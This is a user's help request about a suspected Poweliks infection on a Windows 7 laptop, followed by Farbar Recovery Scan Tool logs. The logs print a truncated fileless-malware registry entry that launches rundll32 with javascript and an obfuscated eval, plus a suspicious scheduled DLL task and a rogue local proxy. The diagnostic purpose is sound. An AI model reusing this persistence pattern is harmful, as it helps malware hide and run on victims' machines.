I think I have a POWELIKS virus

My Dell Latitude E4310 running Windows 7 Professional has been infected with some kind of virus. The virus is using up system RAM and CPU...which causes the computer to run so slow it's almost useless. When I pull up the Windows Task Manager I see that the CPU usage meter fluctuates in the 80's to 90's...if I click on the Processes tab I see that the processes that are being used are jumping all around. Like the virus is causing random processes to run for short periods of time...but they are all adding up to almost 100% CPU usage. It's hard to explain. If I manually start closing the processes that are hogging the most CPU I can get my system to a usable state for a few minutes. But the virus will eventually start running these random processes again.

I've run MBAM (free) and it doesn't find anything. I've also run Spybot and AVAST with nothing found.

I've run TDSSKILLER with nothing found.

I've run ComboFix and it did find a POWELIKS virus which it said it deleted. The computer worked fine for a few minutes until I ran MBAM again...then it started to do the same things as before. The random processes started running and the CPU and RAM started going up to bad levels.

So, I think I need some help.

Right now the system is at 97% CPU and 77% Physical Memory...I'm going to close some processes.
After closing some processes I'm at 3% CPU and 38% Physical Memory. So, I'm sending this email now.

Thanks,
-Chris Ferguson-


Additional scan result of Farbar Recovery Scan Tool (x86) Version: 24-01-2015 01
Ran by User at 2015-01-24 17:32:50
Running from C:\Users\User\Desktop\Malware stuff
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
AS: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 16 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 16.0.0.287 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.10) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated)
Advanced Audio FX Engine (HKLM\...\Advanced Audio FX Engine) (Version: 1.12.05 - Creative Technology Ltd)
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5645 - AVG Technologies)
AVG 2015 (Version: 15.0.4273 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.5645 - AVG Technologies) Hidden
CorelVHS3X86 (HKLM\...\{CB91D8EE-AAC8-4921-AFCB-DB700EEF9D9B}) (Version: 1.05.0000 - Corel)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Dell System Detect (HKU\S-1-5-21-3179565126-1180787063-359821708-1000\...\73f463568823ebbe) (Version: 5.12.0.3 - Dell)
Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.1007.101.210 - ALPS ELECTRIC CO., LTD.)
Dell Webcam Central (HKLM\...\Dell Webcam Central) (Version: 1.40.05 - Creative Technology Ltd)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version: 14.8 - Intel)
Java 7 Update 71 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Junk Mail filter update (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Live! Cam Avatar Creator (HKLM\...\{65D0C510-D7B6-4438-9FC8-E6B91115AB0D}) (Version: 4.6.3009.1 - Creative Technology Ltd)
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-3179565126-1180787063-359821708-1000\...\SkyDriveSetup.exe) (Version: 16.4.6013.0910 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Movie Maker (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
OpenOffice 4.0.1 (HKLM\...\{47F460DA-D1BE-4D85-8DF2-AA1F31D3445F}) (Version: 4.01.9714 - Apache Software Foundation)
Revo Uninstaller 1.95 (HKLM\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Spybot - Search & Destroy (HKLM\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}\InprocServer32 -> C:\Program Files\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll No File
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\localserver32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\localserver32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\FileSyncApi.dll (Microsoft Corporation)

==================== Restore Points  =========================

24-01-2015 13:30:52 ComboFix created restore point
24-01-2015 17:17:02 Configured PowerDVD
24-01-2015 17:21:57 Revo Uninstaller's restore point - Battle.net

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 20:04 - 2015-01-24 16:03 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {24101962-EFCD-48A3-9588-FE6571943DD3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {2E82AEF7-774A-4868-BDA0-4176292D000C} - System32\Tasks\{EBC0B43D-34B9-407B-966A-63943AD95EE7} => C:\Program Files\Freemake\Freemake Video Converter\FreemakeVideoConverter.exe
Task: {4480FA26-0DE2-4425-8D00-BFBA97D00B67} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files\Spybot - Search & Destroy 2\SDImmunize.exe
Task: {534DD19A-C485-4F2C-8C31-A3D51C2B3CFD} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files\Spybot - Search & Destroy 2\SDScan.exe
Task: {5A6E07FB-BBC2-486C-8AF9-3ECD66601DA8} - \BrowserSafeguard Update Task No Task File <==== ATTENTION
Task: {71519836-8433-4BC1-A669-7BFFA4D8575A} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-10] (PC-Doctor, Inc.)
Task: {A27C9E40-6522-4874-B404-6587317BB031} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe
Task: {B0AD704E-4AD4-4673-AFD9-33AED5FFFD0D} - \Optimizer Pro Schedule No Task File <==== ATTENTION
Task: {BE538E25-6810-47D7-9746-96E8507E6CDE} - \BrowserSafeguard No Task File <==== ATTENTION
Task: {E919B31C-4400-4B2E-8926-FAA405BBA3E3} - System32\Tasks\{9BEDCEF3-9189-5EED-E739-0431EB9E4EBE} => C:\Users\User\AppData\Roaming\dkpxfv.dll/s "C:\Users\User\AppData\Roaming\dkpxfv.dll" <==== ATTENTION
Task: {FE1E3EA7-3A55-42D9-B9F4-A40D5FDEA276} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2015-01-22] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Loaded Modules (whitelisted) =============

2014-11-23 21:08 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2014-11-23 21:08 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files\Spybot - Search & Destroy 2\DEC150.bpl
2014-11-23 21:08 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2014-11-23 21:08 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files\Spybot - Search & Destroy 2\sqlite3.dll
2014-11-23 21:08 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2012-01-10 22:12 - 2012-01-10 22:12 - 00094208 _____ () C:\Windows\System32\IccLibDll.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:373E1720

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

========================= Accounts: ==========================

Administrator (S-1-5-21-3179565126-1180787063-359821708-500 - Administrator - Disabled)
Guest (S-1-5-21-3179565126-1180787063-359821708-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3179565126-1180787063-359821708-1002 - Limited - Enabled)
User (S-1-5-21-3179565126-1180787063-359821708-1000 - Administrator - Enabled) => C:\Users\User

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (01/24/2015 05:17:00 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005, Access is denied.
.
This is often caused by incorrect security settings in either the writer or requestor process.

Operation:
   Gathering Writer Data

Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {989c0791-8944-4af3-9e28-21583bc66cc7}

Error: (01/23/2015 00:59:11 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.17496 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 2328

Start Time: 01d0365772617e5f

Termination Time: 1607

Application Path: C:\Program Files\Internet Explorer\iexplore.exe

Report Id:

Error: (01/22/2015 02:30:08 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc292
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00120dbf
Faulting process id: 0x119a4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 01:14:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x525b84d1
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00120dbf
Faulting process id: 0xcc44
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 10:01:04 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc959
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00120dbf
Faulting process id: 0x3a14
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 09:04:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc6b8
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x001202bc
Faulting process id: 0x17a0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 08:10:52 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.17496 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 3880

Start Time: 01d035c7218aa0dd

Termination Time: 919

Application Path: C:\Program Files\Internet Explorer\iexplore.exe

Report Id:

Error: (01/22/2015 07:29:55 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bcbb9
Faulting module name: Flash32_16_0_0_257.ocx, version: 16.0.0.257, time stamp: 0x549259f5
Exception code: 0xc0000005
Fault offset: 0x006a6dfa
Faulting process id: 0x292c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 07:25:15 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc100
Faulting module name: Flash32_16_0_0_257.ocx, version: 16.0.0.257, time stamp: 0x549259f5
Exception code: 0xc0000005
Fault offset: 0x006a6dfa
Faulting process id: 0x29bc
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/21/2015 09:10:40 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bcb52
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x001202bc
Faulting process id: 0x3a2c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

System errors:
=============
Error: (01/24/2015 05:16:38 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.

Error: (01/24/2015 05:16:35 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.

Error: (01/24/2015 05:14:07 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (01/24/2015 04:52:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The risdpcie service failed to start due to the following error:
%%193

Error: (01/24/2015 04:52:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Total Defense Common Scheduler Service service failed to start due to the following error:
%%2

Error: (01/24/2015 04:28:51 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (01/24/2015 04:18:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The risdpcie service failed to start due to the following error:
%%193

Error: (01/24/2015 04:18:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Total Defense Common Scheduler Service service failed to start due to the following error:
%%2

Error: (01/24/2015 04:18:21 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Browser System Enahncer service to connect.

Error: (01/24/2015 04:15:28 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {995C996E-D918-4A8C-A302-45719A6F4EA7}

Microsoft Office Sessions:
=========================

==================== Memory info ===========================

Processor: Intel® Core i5 CPU M 560 @ 2.67GHz
Percentage of memory in use: 37%
Total physical RAM: 3509.86 MB
Available physical RAM: 2206.82 MB
Total Pagefile: 7018.01 MB
Available Pagefile: 5457.46 MB
Total Virtual: 2047.88 MB
Available Virtual: 1900.29 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:297.94 GB) (Free:201.3 GB) NTFS
Drive d: (RCT3) (CDROM) (Total:0.67 GB) (Free:0 GB) CDFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 298.1 GB) (Disk ID: B3AF73EC)
Partition 1: (Active) - (Size=157 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=297.9 GB) - (Type=07 NTFS)

==================== End Of Log ============================

Here are my FARBAR Recovery Scan Tool files:

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 24-01-2015 01
Ran by User (administrator) on USER-PC on 24-01-2015 17:32:12
Running from C:\Users\User\Desktop\Malware stuff
Loaded Profiles: User (Available profiles: User)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgrsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgcsrvx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgwdsvc.exe
(Broadcom Corporation.) C:\Windows\System32\BtwRSupportService.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgnsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgemcx.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe
(Creative Technology Ltd) C:\Program Files\Dell Webcam\Dell Webcam Central\WebcamDell2.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgui.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe
(Dell) C:\Users\User\AppData\Local\Apps\2.0\NLO15GEQ.9JN\QY5WA4B1.38M\dell..tion_e30b47f5d4a30e9e_0005.000c_1df9a4898fae00de\DellSystemDetect.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [292208 2010-06-04] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Dell Webcam Central] => C:\Program Files\Dell Webcam\Dell Webcam Central\WebcamDell2.exe [409744 2009-06-24] (Creative Technology Ltd)
HKLM\...\Run: [sunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM\...\Run: [AVG_UI] => C:\Program Files\AVG\AVG2015\avgui.exe [3667472 2014-12-18] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [sDTray] => C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\...\Run: [DellSystemDetect] => C:\Users\User\AppData\Local\Apps\2.0\NLO15GEQ.9JN\QY5WA4B1.38M\dell..tion_e30b47f5d4a30e9e_0005.000c_1df9a4898fae00de\DellSystemDetect.exe [264488 2014-11-03] (Dell)
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\OemReset.lnk
ShortcutTarget: OemReset.lnk -> C:\Windows\options\OemReset.exe (SoftThinks SAS)
BootExecute: autocheck autochk * sdnclean.exe
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
ProxyServer: [s-1-5-21-3179565126-1180787063-359821708-1000] => http=127.0.0.1:49329;https=127.0.0.1:49329
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.foxnews.com/
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1

FireFox:
========
FF Plugin: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3179565126-1180787063-359821708-1000: ubisoft.com/uplaypc -> C:\Program Files\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll No File
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\CrazyTalk4Native.dll (C3D)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\ctdomemhelper.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\ctframeplayerobject.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\ctplayerobject.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\imagickrt.dll (BEXTech)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npRLCT4Player.dll ( )
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\rlcontentclass.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\RLMusicPacker.dll ()
